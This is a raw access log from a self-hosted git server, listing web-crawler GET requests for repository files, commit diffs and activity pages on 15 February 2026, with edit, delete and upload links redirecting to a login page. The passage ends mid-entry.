https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f.diff" [Client 216.73.216.188] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e.diff" [Client 216.73.216.188] [Length 268508] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker" -[15/Feb/2026:08:09:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/docker-compose.yml" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/Dockerfile" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/docker-compose.yml" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10888] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/Dockerfile" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 11138] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 11572] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/docker-compose.yml" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/weekly" [Client 216.73.216.188] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main" [Client 216.73.216.188] [Length 2844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/halfweekly" [Client 216.73.216.188] [Length 8590] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/docker-compose.yml" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" [Client 216.73.216.188] [Length 11759] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components" [Client 216.73.216.188] [Length 10789] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main" [Client 216.73.216.188] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" [Client 216.73.216.188] [Length 11339] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 216.73.216.188] [Length 11046] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 13922] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json" [Client 216.73.216.188] [Length 11754] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json" [Client 216.73.216.188] [Length 12073] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md" [Client 216.73.216.188] [Length 11528] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/nginx.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/daily" [Client 216.73.216.188] [Length 8585] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets" [Client 216.73.216.188] [Length 11114] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 14579] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data" [Client 216.73.216.188] [Length 10894] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones" [Client 216.73.216.188] [Length 8454] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/nginx.conf" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 12196] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff" [Client 216.73.216.188] [Length 133969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.patch" [Client 216.73.216.188] [Length 818493] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.gitignore" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 25406] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 15158] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 216.73.216.188] [Length 14404] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/recent-commits" [Client 216.73.216.188] [Length 7524] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 13575] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 14464] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 37317] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 15628] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 216.73.216.188] [Length 15699] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html" [Client 216.73.216.188] [Length 32731] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/projects.sln" [Client 216.73.216.188] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/.vscode" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/monthly" [Client 216.73.216.188] [Length 8590] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.diff" [Client 216.73.216.188] [Length 801462] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/.vscode" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 16211] [Gzip 2.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 11751] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/projects.sln" [Client 216.73.216.188] [Length 871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.gitignore" -[15/Feb/2026:08:09:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/update_status.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/update_status.py" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln?display=source" [Client 216.73.216.188] [Length 11933] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/types.ts" [Client 216.73.216.188] [Length 11707] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/.TemporaryDocument" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 11325] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/.TemporaryDocument" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 25651] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj" [Client 216.73.216.188] [Length 11529] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 216.73.216.188] [Length 10863] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 11255] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json" [Client 216.73.216.188] [Length 11284] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/update_status.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/projects.sln" [Client 216.73.216.188] [Length 1089] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/update_status.py" -[15/Feb/2026:08:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch" [Client 216.73.216.188] [Length 32986996] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 10953] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:08:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/docker-compose.yml" [Client 216.73.216.188] [Length 10434] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 